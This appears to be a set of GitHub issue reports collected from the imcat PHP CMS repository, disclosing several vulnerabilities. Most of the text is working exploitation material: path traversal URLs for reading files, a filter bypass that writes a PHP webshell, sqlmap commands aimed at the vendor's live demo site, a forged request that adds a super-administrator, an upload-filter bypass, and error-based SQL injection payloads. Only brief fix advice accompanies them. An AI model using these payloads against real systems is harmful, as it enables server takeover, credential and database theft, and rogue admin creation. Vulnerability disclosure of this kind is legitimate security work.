peacexie / imcat Goto Github PK

1、Login the backstage
http://127.0.0.1/root/run/adm.php

2.find “DIY配置”
http://127.0.0.1/root/run/adm.php?admin-ediy&part=exdiy

3 Click on the “修改”

4 Modify the content payload： And save it

5 Access to this file and it has a Code Execution

fix:
1.The best removal of this function

1 ### Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.2

Vulnerability type: arbitrary file reading, causing serious information leakage

Source code：https://github.com/peacexie/imcat/releases/tag/v5.2

2. Source code ### analysis

In the file root tools adbug search.php, click$_ Request receives parameters from the front end and uses file directly without any filtering_ get_ The contents() function gets the contents of the file and prints them directly on the front page; It can jump to the previous directory by the way of "." / ", as long as the program has permission, it can read any file on the system, causing information leakage; The specific code is shown in the following two figures.

3. Reappearance

(1) Build the environment through phpstudy, and then log in to the background of the website

(2) Visit the following links (you can construct whatever files you want to get, and you can also get system files by ". /" tracing back)
http://127.0.0.1/imcat/root/tools/adbug/search.php?act=View&file= \root\cfgs\boot\cfg_ db.php

http://127.0.0.1/imcat/root/tools/adbug/search.php?act=View&file=../../../../../../test.txt

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: Code Execution

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

PS: it is recommended to use php7.0.12 environment. Other environments will have different problems when loopholes recur

2. Source code analysis

In the background of the CMS, an online source code editing function is provided, and then dangerous functions are filtered through the file imcat-5.4, imcat, core, glib and safscan.php. However, due to the incomplete filtering rules of the filtering function, dangerous code can be written and executed, forming a loophole in code execution, The attacker can gain the permission of the server through this vulnerability

3. Reappearance

Use phpstudy to build the environment, and then log in to the background of the website

(1) Select tool - DIY configuration - select any file to modify. I choose index. PHP here

(2) Try to write a sentence

Then save it and find an error, because the filter rule in imcat-5.4, imcat, core, glib, safscan.php file is triggered

(3) Try to write
$ch = explode(".","hello.ass.world.er.t");
$c = $ch[1].$ch[3].$ch[4]; //assert
$d=$_GET['x'];
$c($d);
Successfully bypassed

(4) Visit
http://127.0.0.1/imcat/index.php?x= fputs(fopen('shell.php','w'),'')
This statement means to create a shell.php file in the same directory as index.php and write a sentence "Trojan horse
Although the page is wrong in reality, the statement has been executed successfully and shell.php has been generated in the same directory

(5) Use ant sword to connect

http://127.0.0.1/imcat/shell.php

4. Repair service suggestions

(1) Turn off the function of modifying the source code in the background

(2) Perfect the rules of detection (this is hard to implement)

Exploit vulnerability ：
Test parameter : order

Use sqlmap(http://sqlmap.org/) and use sqlmap-tamper : unmagicquotes
payload:
sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes'

sqlmap -u 'http://imcat.txjia.com//index.php?sch_faqs=%E6%90%9C%E7%B4%A2&act=1&did=1&mkv=ajax-pick&mod=faqs&order=123&part=1&pid=1&sfid=&sfkw=1&sfop=&stype=&view=1' --dbms mysql -p order --tamper='unmagicquotes' --dbs
GET databases;

Build install imcat and test vuln:

The Vuln-src-code:

because php code set database charset=GBK so bypass addslashes or GPC .

Safetity up:

1. mysql database charset UTF-8
2. Checking http input(GET/POST) data fiter dangerous that.

1. Overview

Official website: http://txjia.com/imcat/

Version: imcat-5.4

Vulnerability type: CSRF post

Source code: https://github.com/peacexie/imcat/releases/tag/v5.4

Harm: Super administrator account can be added

2. Analysis

2.1 logic analysis

In the add administrator page, the security of data source is not verified by token and referer

(1) There is no token used for security verification in the data packet, so there is the possibility of forgery
POST /imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=& HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 539
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/imcat/root/run/adm.php?dops-a&mod=adminer&view=form&stype=&recbk=ref
Cookie: Hm_lvt_948dba1e5d873b9c1f1c77078c521c89=1622443371; CKFinder_Path=Files%3A%2F%3A1; v49_sessid_4294e52897e5=2021-6b-hg49-yttfxda8f-7e5f79d1a; v49_Uniqueid_01348a66d0e6=2021-6h-a25c-5s8pgxq58-0e63b0fe2; Hm_lpvt_948dba1e5d873b9c1f1c77078c521c89=1622444424; twVscAv_admauth=1606cECE916XO1gVfiR9ahqpqkEJMTxa4R5XjBOh69Cfppjn2zcpGMtx5x7BRkm4L0Vposdev%2B2ydGfzzC3me67ttA1foMK2UXNSybiOLOvH; v49_vcodes=fmadm%3Dnull%0Afmcomadd%3D1623809462%2C49f8c2fc48af351f%0Afmapply%3D1623830847%2C7da4f846fdbd0243%0A; v49_ocar_items=0; PHPSESSID=5b4be5ad4c47747257ac13a5c15265c9
Upgrade-Insecure-Requests: 1

recbk=http%3A%2F%2F127.0.0.1%2Fimcat%2Froot%2Frun%2Fadm.php%3Fdops-a%26mod%3Dadminer&fm%5Buid%5D=2021-6p-j6xk&fm%5Buno%5D=1&fm%5Buname%5D=qwe_123&fm%5Bupass%5D=adm_123&fm%5Bgrade%5D=supper&fm%5Bshow%5D=1&fm%5Bmname%5D=qwe_123&fm%5Bindep%5D=inadm&fm%5Bmiuid%5D=&fm%5Bmtel%5D=12345678091&fm%5Bmemail%5D=23wqw%4022.com&fm%5Bmaddr%5D=&fm%5Batime%5D=2021-06-21+17%3A14%3A49&fm%5Betime%5D=2021-06-21+17%3A14%3A49&fm%5Bauser%5D=adm_123&fm%5Beuser%5D=adm_123&fm%5Baip%5D=127.0.0.1&fm%5Beip%5D=127.0.0.1&bsend=%E6%8F%90%E4%BA%A4&mod=adminer&isadd=1

(2) After deleting the referer: information, you can still add an administrator

3. Loophole recurrence

(1) Environment preparation, building environment with phpstudy

(2) Construct a payload with the function of creating a super administrator account, qwe_ 123/adm_ one hundred and twenty-three

<script>history.pushState('', '', '/')</script> (3) Through a variety of fishing means to lure the administrator to click on the page, that is, to complete the action of adding super administrator without the administrator's knowledge    ### 4. Verification of attack results

Using qwe_ 123/adm_ 123 login in the background

5. Means of Defense

Add a token to the place where important actions are performed for authentication. The value of the token must be random and unpredictable

Describe the bug
Upload php files to control the target server

Exploit vulnerability ：
Upload malicious PHP file here:
url:127.0.0.1/root/run/adm.php?
PHP file name: 2.php+ 1.jpg

Use Burpsuite，modify Hex 20 -> 00：
before modification：

after modification：

connect PHP file:
127.0.0.1//xvars/dtmp/@udoc/7b443e5134f395f674ca890ce982e8fd/2020-5w-pja9.php+

The Vuln-src-code:
imcat\core\clib\comUpload.php -> checkType() -> strpos(),because strpos() can not match .php+
imcat\core\clib\comUpload.php -> upEnd() -> in_array() , because In_array() is only used for checking filename whether or not have jpg. ，so we can upload 1.php+ .jpg to bypass filtering.

Credit: @chaitin Tech.

1. Environment construction

Source download: https://github.com/peacexie/imcat/releases

Environmental requirements:Apache 2.4.39 + php 7.3.4 + mysql 5.7.26

2. Vulnerability verification

As shown in the figure below, users can click "Tools->DIY Configuration->DIY Configuration" to edit the website PHP files.

Try to write PHP webshell, as shown in the figure:

Save and find that the system reports an error, as shown in the figure:

At this point, it can be found that the system has a PHP file for security verification, and the eval() dangerous function exists in the PHP webshell, which causes the editing to fail. Find a PHP file upload code on Github (https://github.com/Allen-Liang/backup-for-php/edit/master/backup.php), modify the bootskip.php file to the PHP file upload code.

Visit at this time:http://10.211.55.9:83/root/cfgs/boot/bootskip.php

username:username password：yourpassword

Any file can be uploaded at this time, including PHP webshell. as the picture shows:

Visit the url of webshell, as shown in the figure:

3. Vulnerability analysis

Analyze the system imcat/core/glib/safScan.php file, in which some functions with Webshell features are defined.

However, after modifying the PHP file to other scripting languages and functions other than the dangerous function defined for this file, this file will not be intercepted, causing the attacker to modify the PHP file as a file upload function, and then upload the Webshell on this basis. You can get the permissions of the web application.

1、Login the backstage
http://127.0.0.1/root/run/adm.php

payload：fm[instop][note]='"/></script><script>alert(1)</script>

fix：

1. Strictly verify user input, you must perform strict checks and html escape escaping on all input scripts, iframes, etc. The input here is not only the input interface that the user can directly interact with, but also the variables in the HTTP request in the HTTP request, the variables in the HTTP request header, and so on.
2. Verify the data type and verify its format, length, scope, and content.
3. Not only need to be verified on the client side but also on the server side.
4. The output data should also be checked. The values in the database may be output in multiple places on a large website. Even if the input is coded, the security check should be performed at the output points.

Hi, I would like to report Sql injection vulnerability in latest release(v5.2) product reviews（/root/plus/coms/add_coms.php）

I found it in the demo(https://imcat.txjia.com/chn.php?crem&pid=2015-9h-n441)

Add a product reviews

Test the fm[auser] in request body

payload：
'and/**/extractvalue('anything',concat('~',(select user())))and'

payload:
'and/**/extractvalue('anything',concat('~',(select @@datadir)))and'

payload
'and/**/extractvalue('anything',concat('~',(select database())))and'